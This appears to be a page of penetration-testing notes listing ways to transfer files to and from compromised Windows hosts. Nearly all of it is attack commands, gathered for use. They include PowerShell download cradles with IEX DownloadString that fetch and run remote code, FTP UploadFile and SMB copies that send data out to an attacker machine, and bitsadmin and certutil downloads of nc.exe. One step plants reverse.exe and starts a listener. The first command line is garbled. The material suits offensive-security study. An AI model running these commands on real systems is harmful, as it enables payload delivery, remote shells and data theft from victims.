📸Windows

Transferring files to/from remote Windows systems

Python Web Server (https://da.gd/9AaLR)
- python3 -b 0.0.0.0 8080\windows\system32\curl.exe –upload-file http://ip:port/outfile
Base64
- Upload to remote server
  - base64 file
  - [IO.File]::WriteAllBytes("C:\outputfile", [Convert]::FromBase64String("base64"))
- Download from remote server
  - [Convert]::ToBase64String((Get-Content -path "C:\file" -Encoding byte))
  - echo "base64_text" | base64 -d > outputfile
SMB
- sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
  - Mount the SMB Server with Username and Password: net use n: \kali\share /user:test test
  - copy n:\file
- Another way
  - On our machine: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
  - On remote machine: copy \\kali\reverse.exe C:\PrivEsc\reverse.exe
  - Then run listener on our machine and run program on remote machine
evil-winrm (same commands for meterpreter) (file must be an absolute path)
- download (file)
- upload (file)
Powershell
- iwr http://ip:port/filename -outfile <path\to\file>
- (New-Object Net.WebClient).DownloadFile('Target File URL','Output File Name')
- (New-Object Net.WebClient).DownloadFileAsync('Target File URL','Output File Name')
- IEX (New-Object Net.WebClient).DownloadString('Target File URL')
FTP
- Upload to remote server
  - sudo pip3 install pyftpdlib
  - sudo python3 -m pyftpdlib --port 21
  - (New-Object Net.WebClient).DownloadFile('ftp://ip/file.txt', 'ftp-file.txt')
- Download from remote server
  - sudo python3 -m pyftpdlib --port 21 --write
  - (New-Object Net.WebClient).UploadFile('ftp://ip/outputfile', 'remote_file')
Misc Methods
- Download a file from attack_machine using Bitsadmin:
  - bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
- Download a file from attack_machine using Certutil:
  - certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

PreviousLinux NextPivoting / Lateral Movement Techniques

Last updated 2 years ago